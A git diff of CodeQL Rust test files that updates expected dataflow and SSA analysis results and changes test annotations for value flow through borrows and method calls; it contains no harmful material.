main.rs:175:14:175:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:175:14:175:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | | main.rs:179:13:179:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | @@ -152,6 +220,17 @@ nodes | main.rs:180:14:180:31 | ... .get(...) | semmle.label | ... .get(...) | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | semmle.label | &my_number [&ref, MyNumber] | | main.rs:180:16:180:24 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:184:13:184:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:184:25:184:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:184:44:184:53 | source(...) | semmle.label | source(...) | +| main.rs:186:14:186:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:186:14:186:28 | my_number.get(...) | semmle.label | my_number.get(...) | +| main.rs:190:13:190:21 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | +| main.rs:190:25:190:55 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | +| main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:190:45:190:54 | source(...) | semmle.label | source(...) | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | +| main.rs:192:14:192:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | | main.rs:200:29:200:38 | ...: i64 | semmle.label | ...: i64 | | main.rs:201:10:201:10 | [post] n [&ref] | semmle.label | [post] n [&ref] | @@ -160,11 +239,58 @@ nodes | main.rs:210:20:210:29 | source(...) | semmle.label | source(...) | | main.rs:211:14:211:15 | * ... | semmle.label | * ... | | main.rs:211:15:211:15 | p [&ref] | semmle.label | p [&ref] | +| main.rs:218:17:218:22 | [post] &mut n [&ref] | semmle.label | [post] &mut n [&ref] | +| main.rs:218:22:218:22 | [post] n | semmle.label | [post] n | +| main.rs:218:25:218:34 | source(...) | semmle.label | source(...) | +| main.rs:219:14:219:14 | n | semmle.label | n | +| main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | semmle.label | SelfParam [Return] [&ref, MyNumber] | +| main.rs:223:27:223:37 | ...: i64 | semmle.label | ...: i64 | +| main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | semmle.label | [post] self [&ref, MyNumber] | +| main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:224:40:224:45 | number | semmle.label | number | +| main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | semmle.label | ...: ... [Return] [&ref, MyNumber] | +| main.rs:228:37:228:47 | ...: i64 | semmle.label | ...: i64 | +| main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | semmle.label | [post] n [&ref, MyNumber] | +| main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:229:33:229:38 | number | semmle.label | number | +| main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | semmle.label | [post] &mut my_number [&ref, MyNumber] | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:234:36:234:45 | source(...) | semmle.label | source(...) | +| main.rs:235:14:235:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:235:14:235:28 | my_number.get(...) | semmle.label | my_number.get(...) | +| main.rs:237:14:237:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:237:14:237:28 | my_number.get(...) | semmle.label | my_number.get(...) | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:243:23:243:32 | source(...) | semmle.label | source(...) | +| main.rs:244:14:244:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:244:24:244:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:246:14:246:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:246:24:246:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | semmle.label | [post] &mut my_number [&ref, MyNumber] | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:252:30:252:39 | source(...) | semmle.label | source(...) | +| main.rs:253:14:253:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:253:24:253:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:255:14:255:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:255:24:255:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | subpaths -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:180:14:180:31 | ... .get(...) | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:186:14:186:28 | my_number.get(...) | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:192:14:192:34 | my_number.to_number(...) | | main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:210:17:210:17 | [post] p [&ref] | +| main.rs:218:25:218:34 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:218:17:218:22 | [post] &mut n [&ref] | +| main.rs:234:36:234:45 | source(...) | main.rs:228:37:228:47 | ...: i64 | main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:235:14:235:28 | my_number.get(...) | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:237:14:237:28 | my_number.get(...) | +| main.rs:243:23:243:32 | source(...) | main.rs:223:27:223:37 | ...: i64 | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | main.rs:243:9:243:17 | [post] my_number [MyNumber] | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:244:14:244:33 | to_number(...) | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:246:14:246:33 | to_number(...) | +| main.rs:252:30:252:39 | source(...) | main.rs:223:27:223:37 | ...: i64 | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:253:14:253:33 | to_number(...) | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:255:14:255:33 | to_number(...) | testFailures +| main.rs:255:14:255:33 | to_number(...) | Unexpected result: hasValueFlow=99 | #select | main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | | main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | @@ -172,8 +298,19 @@ testFailures | main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | | main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) | | main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | +| main.rs:91:14:91:14 | a | main.rs:90:21:90:30 | source(...) | main.rs:91:14:91:14 | a | $@ | main.rs:90:21:90:30 | source(...) | source(...) | +| main.rs:98:14:98:26 | to_be_cleared | main.rs:95:33:95:42 | source(...) | main.rs:98:14:98:26 | to_be_cleared | $@ | main.rs:95:33:95:42 | source(...) | source(...) | | main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | | main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | | main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | | main.rs:180:14:180:31 | ... .get(...) | main.rs:179:44:179:53 | source(...) | main.rs:180:14:180:31 | ... .get(...) | $@ | main.rs:179:44:179:53 | source(...) | source(...) | +| main.rs:186:14:186:28 | my_number.get(...) | main.rs:184:44:184:53 | source(...) | main.rs:186:14:186:28 | my_number.get(...) | $@ | main.rs:184:44:184:53 | source(...) | source(...) | +| main.rs:192:14:192:34 | my_number.to_number(...) | main.rs:190:45:190:54 | source(...) | main.rs:192:14:192:34 | my_number.to_number(...) | $@ | main.rs:190:45:190:54 | source(...) | source(...) | | main.rs:211:14:211:15 | * ... | main.rs:210:20:210:29 | source(...) | main.rs:211:14:211:15 | * ... | $@ | main.rs:210:20:210:29 | source(...) | source(...) | +| main.rs:219:14:219:14 | n | main.rs:218:25:218:34 | source(...) | main.rs:219:14:219:14 | n | $@ | main.rs:218:25:218:34 | source(...) | source(...) | +| main.rs:235:14:235:28 | my_number.get(...) | main.rs:234:36:234:45 | source(...) | main.rs:235:14:235:28 | my_number.get(...) | $@ | main.rs:234:36:234:45 | source(...) | source(...) | +| main.rs:237:14:237:28 | my_number.get(...) | main.rs:234:36:234:45 | source(...) | main.rs:237:14:237:28 | my_number.get(...) | $@ | main.rs:234:36:234:45 | source(...) | source(...) | +| main.rs:244:14:244:33 | to_number(...) | main.rs:243:23:243:32 | source(...) | main.rs:244:14:244:33 | to_number(...) | $@ | main.rs:243:23:243:32 | source(...) | source(...) | +| main.rs:246:14:246:33 | to_number(...) | main.rs:243:23:243:32 | source(...) | main.rs:246:14:246:33 | to_number(...) | $@ | main.rs:243:23:243:32 | source(...) | source(...) | +| main.rs:253:14:253:33 | to_number(...) | main.rs:252:30:252:39 | source(...) | main.rs:253:14:253:33 | to_number(...) | $@ | main.rs:252:30:252:39 | source(...) | source(...) | +| main.rs:255:14:255:33 | to_number(...) | main.rs:252:30:252:39 | source(...) | main.rs:255:14:255:33 | to_number(...) | $@ | main.rs:252:30:252:39 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index 6eb1e8b544d5..b96246ff6c44 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs @@ -88,14 +88,14 @@ mod intraprocedural_mutable_borrows { let mut a = 1; sink(a); *(&mut a) = source(87); - sink(a); // $ MISSING: hasValueFlow=87 + sink(a); // $ hasValueFlow=87 } pub fn clear_through_borrow() { let mut to_be_cleared = source(34); let p = &mut to_be_cleared; *p = 0; - sink(to_be_cleared); // variable is cleared + sink(to_be_cleared); // $ SPURIOUS: hasValueFlow=34 } pub fn write_through_borrow_in_match(cond: bool) { @@ -183,13 +183,13 @@ mod interprocedural_immutable_borrows { pub fn through_self_in_method_implicit_borrow() { let my_number = MyNumber::MyNumber(source(85)); // Implicit borrow - sink(my_number.get()); // $ MISSING: hasValueFlow=85 + sink(my_number.get()); // $ hasValueFlow=85 } pub fn through_self_in_method_implicit_deref() { let my_number = &MyNumber::MyNumber(source(58)); // Implicit dereference - sink(my_number.to_number()); // $ MISSING: hasValueFlow=58 + sink(my_number.to_number()); // $ hasValueFlow=58 } } @@ -216,7 +216,7 @@ mod interprocedural_mutable_borrows { let mut n = 0; sink(n); set_int(&mut n, source(55)); - sink(n); // $ MISSING: hasValueFlow=55 + sink(n); // $ hasValueFlow=55 } impl MyNumber { @@ -232,27 +232,27 @@ mod interprocedural_mutable_borrows { pub fn mutate_enum_through_function() { let mut my_number = MyNumber::MyNumber(0); set_number(&mut my_number, source(64)); - sink(my_number.get()); // $ MISSING: hasValueFlow=64 + sink(my_number.get()); // $ hasValueFlow=64 set_number(&mut my_number, 0); - sink(my_number.get()); // now cleared + sink(my_number.get()); // $ SPURIOUS: hasValueFlow=64 } pub fn mutate_enum_through_method_implicit_borrow() { let mut my_number = MyNumber::MyNumber(0); // Implicit borrow. my_number.set(source(45)); - sink(to_number(my_number)); // $ MISSING: hasValueFlow=45 + sink(to_number(my_number)); // $ hasValueFlow=45 my_number.set(0); - sink(to_number(my_number)); // now cleared + sink(to_number(my_number)); // $ SPURIOUS: hasValueFlow=45 } pub fn mutate_enum_through_method_explicit_borrow() { let mut my_number = MyNumber::MyNumber(0); // Explicit borrow. (&mut my_number).set(source(99)); - sink(to_number(my_number)); // $ MISSING: hasValueFlow=99 + sink(to_number(my_number)); // $ hasValueFlow=99 (&mut my_number).set(0); - sink(to_number(my_number)); // now cleared + sink(to_number(my_number)); // SPURIOUS: hasValueFlow=99 } } diff --git a/rust/ql/test/library-tests/dataflow/sources/test.rs b/rust/ql/test/library-tests/dataflow/sources/test.rs index 53a5edfd8ad4..e4c6b2736d74 100644 --- a/rust/ql/test/library-tests/dataflow/sources/test.rs +++ b/rust/ql/test/library-tests/dataflow/sources/test.rs @@ -117,7 +117,7 @@ async fn test_hyper_http(case: i64) -> Result<(), Box> { // more realistic uses of results... let request = http::Request::builder().uri(url).body(String::from(""))?; let mut response = sender.send_request(request).await?; // $ Alert[rust/summary/taint-sources] - sink(&response); // $ MISSING: hasTaintFlow=request + sink(&response); // $ hasTaintFlow=request if !response.status().is_success() { return Err("request failed".into()) diff --git a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected index ee15de985dcd..b58932b3909f 100644 --- a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected @@ -17,9 +17,8 @@ edges | main.rs:52:9:52:10 | s2 | main.rs:53:10:53:11 | s2 | provenance | | | main.rs:52:14:52:29 | ...::from(...) | main.rs:52:9:52:10 | s2 | provenance | | | main.rs:52:27:52:28 | s1 | main.rs:52:14:52:29 | ...::from(...) | provenance | MaD:1 | -| main.rs:63:9:63:9 | s | main.rs:64:16:64:16 | s | provenance | | +| main.rs:63:9:63:9 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | | main.rs:63:13:63:22 | source(...) | main.rs:63:9:63:9 | s | provenance | | -| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | | main.rs:68:9:68:9 | s | main.rs:70:34:70:61 | MacroExpr | provenance | | | main.rs:68:9:68:9 | s | main.rs:73:34:73:59 | MacroExpr | provenance | | | main.rs:68:13:68:22 | source(...) | main.rs:68:9:68:9 | s | provenance | | @@ -66,7 +65,6 @@ nodes | main.rs:53:10:53:11 | s2 | semmle.label | s2 | | main.rs:63:9:63:9 | s | semmle.label | s | | main.rs:63:13:63:22 | source(...) | semmle.label | source(...) | -| main.rs:64:16:64:16 | s | semmle.label | s | | main.rs:64:16:64:25 | s.as_str(...) | semmle.label | s.as_str(...) | | main.rs:68:9:68:9 | s | semmle.label | s | | main.rs:68:13:68:22 | source(...) | semmle.label | source(...) | diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 57245cc30e7e..619283dc4b5a 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -1,12 +1,3 @@ -nonSsaVariable -| main.rs:371:13:371:13 | a | -| main.rs:379:13:379:13 | i | -| main.rs:402:13:402:13 | x | -| main.rs:409:13:409:13 | z | -| main.rs:422:13:422:13 | x | -| main.rs:456:13:456:13 | z | -| main.rs:531:13:531:13 | a | -| main.rs:568:11:568:11 | a | definition | main.rs:3:14:3:14 | s | main.rs:3:14:3:14 | s | | main.rs:7:14:7:14 | i | main.rs:7:14:7:14 | i | @@ -110,13 +101,24 @@ definition | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | +| main.rs:371:13:371:13 | a | main.rs:371:13:371:13 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | @@ -127,7 +129,9 @@ definition | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 | closure2 | | main.rs:451:9:451:9 | y | main.rs:448:13:448:13 | y | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | | main.rs:466:13:466:13 | i | main.rs:466:13:466:13 | i | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | | main.rs:468:9:468:9 | i | main.rs:466:13:466:13 | i | @@ -146,11 +150,16 @@ definition | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | | main.rs:544:5:544:5 | a | main.rs:540:13:540:13 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | @@ -246,7 +255,12 @@ read | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | main.rs:356:13:356:13 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | main.rs:365:12:365:12 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | main.rs:366:19:366:22 | text | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:374:11:374:11 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | main.rs:375:15:375:15 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | main.rs:381:14:381:14 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | main.rs:382:6:382:10 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | main.rs:383:15:383:15 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:388:10:388:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:389:10:389:10 | x | @@ -256,10 +270,17 @@ read | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:396:10:396:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:398:9:398:9 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | main.rs:397:6:397:6 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | main.rs:404:27:404:27 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | main.rs:405:6:405:6 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:411:19:411:19 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | main.rs:413:14:413:14 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:416:7:416:7 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | main.rs:418:15:418:15 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | main.rs:424:14:424:14 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | main.rs:425:6:425:6 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | main.rs:426:15:426:15 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | main.rs:436:15:436:15 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | main.rs:435:5:435:7 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | main.rs:433:19:433:19 | x | @@ -268,7 +289,9 @@ read | main.rs:442:20:444:5 | x | main.rs:440:13:440:13 | x | main.rs:443:19:443:19 | x | | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 | closure2 | main.rs:453:5:453:12 | closure2 | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | main.rs:454:15:454:15 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | main.rs:462:15:462:15 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | main.rs:461:5:461:12 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | main.rs:459:9:459:9 | z | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | main.rs:471:5:471:9 | block | | main.rs:471:5:471:15 | i | main.rs:466:13:466:13 | i | main.rs:472:15:472:15 | i | | main.rs:475:8:475:8 | b | main.rs:475:8:475:8 | b | main.rs:479:8:479:8 | b | @@ -291,6 +314,10 @@ read | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:526:9:526:9 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | main.rs:523:13:523:16 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | main.rs:523:25:523:25 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | main.rs:532:15:532:15 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:534:15:534:15 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | main.rs:536:15:536:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:542:5:542:5 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:543:15:543:15 | a | @@ -299,6 +326,8 @@ read | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:551:15:551:15 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | main.rs:554:20:554:20 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | main.rs:563:6:563:9 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | main.rs:569:3:569:3 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | main.rs:571:13:571:13 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | main.rs:595:15:595:28 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | main.rs:601:15:601:26 | var_in_macro | @@ -382,13 +411,24 @@ firstRead | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | main.rs:356:13:356:13 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | main.rs:365:12:365:12 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | main.rs:366:19:366:22 | text | +| main.rs:371:13:371:13 | a | main.rs:371:13:371:13 | a | main.rs:372:5:372:5 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | main.rs:375:15:375:15 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | main.rs:381:14:381:14 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | main.rs:382:6:382:10 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | main.rs:383:15:383:15 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:394:6:394:6 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | main.rs:397:6:397:6 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | main.rs:404:27:404:27 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | main.rs:405:6:405:6 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | main.rs:413:14:413:14 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | main.rs:418:15:418:15 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | main.rs:424:14:424:14 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | main.rs:425:6:425:6 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | main.rs:426:15:426:15 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | main.rs:436:15:436:15 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | main.rs:435:5:435:7 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | main.rs:433:19:433:19 | x | @@ -397,7 +437,9 @@ firstRead | main.rs:442:20:444:5 | x | main.rs:440:13:440:13 | x | main.rs:443:19:443:19 | x | | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 